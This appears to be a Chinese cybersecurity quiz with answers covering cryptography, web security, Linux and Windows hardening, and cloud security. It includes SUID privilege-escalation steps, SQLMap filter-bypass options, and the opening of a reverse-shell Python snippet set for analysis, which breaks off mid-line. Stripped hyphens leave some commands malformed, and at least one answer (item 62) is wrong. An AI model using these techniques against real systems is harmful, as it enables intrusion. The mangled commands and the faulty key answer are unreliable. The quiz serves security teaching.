网络安全知识竞答题及答案

网络安全知识竞答题及答案一、单项选择题（每题1分，共30分。每题只有一个正确答案，请将正确选项字母填入括号内）1.以下哪一项最能有效降低暴力破解口令的成功率（）A.将密码长度限制为6位并强制包含大小写字母B.在登录接口增加图形验证码与账户锁定策略C.要求用户每30天修改一次密码但允许重用旧密码D.将用户密码以Base64编码后存入数据库答案：B2.关于TLS1.3与TLS1.2的差异，下列描述正确的是（）A.TLS1.3支持RSA密钥交换B.TLS1.3握手默认加密Certificate报文C.TLS1.3仍支持CBC模式的对称加密D.TLS1.3握手需要更多往返次数答案：B3.在Linux系统中，若文件权限为“rwsrxrx”，则其中“s”位表示（）A.强制位（强制锁定）B.粘滞位C.SetUID位D.SetGID位答案：C4.针对CSRF攻击，下列防御措施无效的是（）A.验证HTTPReferer头B.使用一次性Token并绑定用户会话C.将敏感操作改为GET请求方便日志记录D.启用SameSite=Strict的Cookie属性答案：C5.以下哪条命令可直接查看Windows本地安全策略中“用户权限分配”设置（）A.gpedit.mscB.secedit/exportC.netconfigD.msconfig答案：B6.关于国密算法SM2、SM3、SM4，下列说法正确的是（）A.SM2是分组密码算法B.SM3输出长度为256位C.SM4密钥长度为192位D.SM2签名过程不需要随机数答案：B7.在OWASPTop102021中，排名首位的安全风险类别是（）A.失效的访问控制B.加密失败C.注入D.不安全设计答案：A8.若某Web应用使用JWT作为会话令牌，签名算法为“none”，则攻击者可以（）A.仅查看令牌内容无法篡改B.直接修改令牌payload并重新提交C.必须获取对称密钥才能伪造D.无法绕过服务端签名验证答案：B9.关于零信任架构，下列描述错误的是（）A.默认信任内网流量B.以身份为中心C.动态访问控制D.持续信任评估答案：A10.在IPv6网络中，邻居发现协议（NDP）遭受的欺骗攻击可用下列哪种技术缓解（）A.DHCPSnoopingB.RAGuardC.ARPInspectionD.IPSourceGuard答案：B11.以下哪项不是对称加密算法（）A.ChaCha20B.3DESC.ECCD.AES256GCM答案：C12.当使用nmap进行端口扫描时，参数“sS”的含义是（）A.TCPConnect扫描B.SYN隐秘扫描C.UDP扫描D.ACK扫描答案：B13.关于DNSSEC，下列说法正确的是（）A.使用DS记录验证子zone公钥B.提供数据机密性C.依赖CA颁发证书D.阻止DNS缓存投毒但无法防止放大攻击答案：A14.在Android应用逆向中，以下哪项技术可防止动态调试（）A.在AndroidManifest.xml中设置android:debuggable="true"B.使用DexGuard混淆C.在native层调用ptrace(PTRACE_TRACEME)D.将敏感代码写入Java层答案：C15.关于云共享责任模型，IaaS场景下下列哪项由云服务商负责（）A.客户操作系统补丁B.虚拟化平台漏洞修复C.客户数据库加密D.客户IAM策略答案：B16.当防火墙规则出现“ShadowRule”时，其含义是（）A.规则顺序导致某些规则永远匹配不到B.规则被注释掉C.规则匹配所有流量D.规则存在语法错误答案：A17.在PKI体系中，负责颁发CRL的机构是（）A.RAB.VAC.CAD.OCSPResponder答案：C18.关于WAF绕过，下列哪项技术利用的是对“分块传输编码”处理差异（）A.Unicode变形B.HTTPParameterPollutionC.Chunked编码大小写混淆D.JSON二次编码答案：C19.以下哪条Linux命令可用于持续监控文件完整性（）A.lsalB.ausearchC.aideD.lsof答案：C20.在Windows日志中，事件ID4624表示（）A.账户登录失败B.账户成功登录C.权限提升D.对象访问答案：B21.关于BGP安全，下列哪项协议用于验证路由起源（）A.RPKIB.IPSecC.DNSSECD.SRTP答案：A22.当使用SQLMap进行注入测试时，参数“tamper=space2comment”的作用是（）A.将空格替换为//绕过过滤B.将空格替换为%20C.将空格替换为+D.将空格替换为制表符答案：A23.关于勒索软件防御，下列哪项属于“前置”环节措施（）A.离线备份B.支付赎金C.解密工具购买D.媒体公关答案：A24.在容器安全中，以下哪项技术可限制进程系统调用（）A.SeccompB.OverlayFSC.CgroupD.UnionMount答案：A25.关于侧信道攻击，下列哪项属于时间信道（）A.缓存时序B.功耗分析C.电磁泄漏D.故障注入答案：A26.以下哪项不是软件供应链安全检测工具（）A.SnykB.OWASPDependencyCheckC.JenkinsD.SonatypeNexusIQ答案：C27.在密码管理器中，使用AES256GCM加密用户保险库，密钥派生函数为Argon2id，其主要目的是（）A.增加对称密钥长度B.抵抗GPU并行破解C.减少内存占用D.提供前向保密答案：B28.关于社会工程学，攻击者冒充IT支持人员索要密码的行为属于（）A.诱饵B.假托C.尾随D.钓鱼答案：B29.在工控协议ModbusTCP中，功能码0x05的作用是（）A.读保持寄存器B.写单个线圈C.写多个寄存器D.读离散输入答案：B30.关于量子计算对密码学的影响，下列算法中目前被认为可抵抗量子攻击的是（）A.RSA4096B.ECDSAP256C.CRYSTALSKYBERD.DSA答案：C二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）31.以下哪些属于常见的HTTP安全响应头（）A.ContentSecurityPolicyB.XFrameOptionsC.StrictTransportSecurityD.ETag答案：A、B、C32.关于内存破坏漏洞，下列哪些技术可有效缓解（）A.DEP/NXB.ASLRC.StackCanaryD.SQLPreparedStatement答案：A、B、C33.以下哪些端口与远程桌面协议直接相关（）A.TCP3389B.UDP3389C.TCP5900D.TCP5985答案：A、B34.关于OAuth2.0授权码模式，下列哪些参数在授权端点必须出现（）A.response_typeB.client_idC.redirect_uriD.grant_type答案：A、B、C35.以下哪些属于对称加密的工作模式（）A.GCMB.CTRC.CBCD.ECB答案：A、B、C、D36.在Linux系统中，以下哪些命令可用于查看当前网络连接状态（）A.ssB.netstatC.lsofiD.psaux答案：A、B、C37.关于恶意软件分析，下列哪些属于动态分析技术（）A.沙箱运行B.APIHookingC.字符串静态提取D.行为日志监控答案：A、B、D38.以下哪些属于云原生安全工具（）A.FalcoB.kubebenchC.TerraformD.OPAGatekeeper答案：A、B、D39.关于无线网络安全，下列哪些攻击针对WPA3（）A.DragonbloodB.KRACKC.PMKID捕获D.Downgrade攻击答案：A、D40.以下哪些属于我国《网络安全法》明确的关键信息基础设施行业（）A.金融B.能源C.医疗D.教育答案：A、B、C三、填空题（每空1分，共20分）41.在Windows系统中，用于存储用户哈希的SAM文件位于路径________。答案：%SystemRoot%\system32\config\SAM42.使用OpenSSL生成长度为2048位RSA私钥的命令参数为opensslgenrsaoutkey.pem________。答案：204843.在Linux中，设置文件不可修改属性使用的命令是chattr+________filename。答案：i44.国密算法SM4的分组长度为________位。答案：12845.在SQL注入中，使用“________”函数可获取当前数据库用户名（MySQL）。答案：user()46.事件响应六阶段模型中，第一阶段为________。答案：准备47.在IPv4报文中，TTL字段占________字节。答案：148.用于检测网络中是否存在ARP欺骗的常用命令行工具是________。答案：arpwatch49.在渗透测试中，对目标进行信息收集时，WHOIS查询默认使用的端口号是________。答案：4350.在公钥基础设施中，OCSP协议默认使用的端口号是________。答案：80（或443，若使用OCSPstaplingoverTLS）51.在Kubernetes中，用于限制容器CPU资源的字段为resources.________。答案：limits52.在Windows日志清除痕迹时，事件查看器进程名称为________。答案：eventvwr.msc53.在Metasploit中，用于搜索模块的命令是________。答案：search54.在密码学中，DiffieHellman算法主要用于解决________问题。答案：密钥交换55.在Android反调试技术中，检测TracerPid需读取文件/proc/self/________。答案：status56.在防火墙规则优化中，把最常用规则放在前面的方法称为________排序。答案：频率57.在勒索软件加密策略中，使用AES加密文件后，再用RSA公钥加密AES密钥，该模式称为________加密。答案：混合58.在Web安全中，CSP指令defaultsrc'self'表示默认仅允许加载________源资源。答案：同源59.在二进制漏洞利用中，覆盖返回地址前通常需要先确定________偏移量。答案：EIP/RIP60.在等级保护2.0中，安全区域边界要求实现________检测。答案：入侵四、判断题（每题1分，共10分。正确打“√”，错误打“×”）61.TLS1.3支持重协商机制以增强兼容性。（）答案：×62.在Linux中，文件权限为000意味着任何用户都无法读取该文件。（）答案：√63.使用HTTPS就能完全避免中间人攻击，无需证书校验。（）答案：×64.在WiFi6中，WPA3SAE协议可抵抗离线字典攻击。（）答案：√65.零日漏洞是指已经发布补丁但用户尚未安装的漏洞。（）答案：×66.在渗透测试中，获得书面授权是区分合法与非法行为的关键。（）答案：√67.国密SM2算法的签名平均长度固定为64字节。（）答案：√68.在Docker中，容器与宿主机共享内核，因此内核漏洞会影响所有容器。（）答案：√69.使用ARPs命令静态绑定网关MAC后可彻底杜绝ARP欺骗。（）答案：×70.量子计算机使用Shor算法可在多项式时间内分解大整数。（）答案：√五、简答题（共30分）71.（封闭型，6分）简述缓冲区溢出攻击中NX/DEP与ROP链的关系，并说明如何在Windows系统层面启用DEP。答案：NX（NoeXecute）或DEP（DataExecutionPrevention）将数据段标记为不可执行，使攻击者注入的shellcode无法直接运行。为绕过DEP，攻击者使用ROP（ReturnOrientedProgramming）技术，利用程序自身已有的可执行片段（gadgets）拼接恶意逻辑，避免写入可执行代码。Windows系统层面启用DEP：系统属性→高级→性能设置→数据执行保护→选择“为所有程序和服务启用DEP（除我选定的之外）”，重启生效；或通过命令行bcdedit/setnxAlwaysOn。72.（开放型，8分）结合实例说明OAuth2.0授权码模式下的“授权码泄露”风险及其防御方案。答案：风险：攻击者通过开放重定向、Referer头泄露或TLS中间人（如恶意WiFi）获取授权码，随后在合法客户端的redirect_uri上抢先兑换access_token，导致用户会话被劫持。实例：某Web应用redirect_uri未严格校验，攻击者构造钓鱼链接，授权后授权码被发送至攻击者服务器。防御：1.精确注册redirect_uri，禁止模糊匹配；2.启用PKCE，客户端生成code_verifier，授权码+code_challenge校验；3.授权码一次性有效且有效期≤10分钟；4.强制使用HTTPS，防止传输层泄露；5.服务端绑定授权码与client_id、code_challenge，兑换时双重校验。73.（封闭型，6分）列出Linux系统下查找SUID权限文件的命令，并说明如何利用此类文件提权及缓解措施。答案：查找命令：find/perm4000typef2>/dev/null。利用：若某SUID文件调用系统命令未使用绝对路径，可被PATH劫持；或存在缓冲区溢出，可执行任意代码获得root权限。缓解：1.最小化SUID文件数量，移除不必要的如/usr/bin/ping若业务不需要；2.使用dpkgstatgen或rpmVa定期审计；3.挂载文件系统时使用nosuid选项；4.启用AppArmor或SELinux限制SUID程序行为。74.（开放型，10分）某企业采用微服务架构，服务间通信采用gRPCoverTLS。请设计一套“端到端零信任”安全方案，涵盖身份、传输、工作负载、观测四方面，并给出关键配置片段或工具。答案：身份：所有服务注入SPIFFEID，使用IstioCitadel签发短周期X.509证书，字段URISAN携带spiffe://trustdomain/ns/namespace/sa/serviceaccount。传输：mTLS强制，CipherSuite仅启用TLS_AES_256_GCM_SHA384，禁用重协商；IstioPeerAuthentication模式为STRICT。工作负载：OPAGatekeeper准入控制器限制镜像必须来自企业Harbor且通过CVE扫描≤High；运行时Falco规则检测异常syscall如ptrace、execve("/bin/sh")。观测：Prometheus采集mTLS握手失败率、EnvoyRBAC拒绝次数；Grafana大盘阈值告警；Loki收集Istiosidecar访问日志，字段包括principal、response_code、bytes_sent，用于审计与溯源。关键配置：PeerAuthentication:apiVersion:security.istio.io/v1beta1kind:PeerAuthenticationmetadata:name:defaultspec:mtls:mode:STRICTAuthorizationPolicy:apiVersion:security.istio.io/v1beta1kind:AuthorizationPolicymetadata:name:frontendtobackendspec:selector:matchLabels:app:backendrules:from:source:principals:["cluster.local/ns/frontend/sa/frontend"]when:key:request.headers[xuserrole]values:["admin"]六、应用题（共40分）75.（计算类，10分）某Web应用使用PBKDF2HMACSHA256进行密码哈希，迭代次数为10000，盐长16字节。假设攻击者拥有RTX4090GPU，算力为14GH/s（SHA256），若字典大小为1亿条，平均每条密码长度8字节，估算暴力破解一条用户密码的期望时间（秒），并给出计算过程。答案：PBKDF2HMACSHA256一次需要2次SHA256运算（HMAC内部与外部），迭代10000次，则单次哈希需20000次SHA256。GPU算力14GH/s=14×10^9次SHA256/s。每秒可尝试密码数=14×10^9/20000=7×10^5条/s。字典1亿条，期望需遍历一半：5×10^7条。时间=5×10^7/(7×10^5)≈71.4秒。76.（分析类，15分）给出一段疑似恶意Python脚本片段，请逐行分析其行为，并输出对应的ATT&CK战术与技术编号。片段：importbase64,socket,subprocess,oss=socket.socket(2,1)s.connect(("0",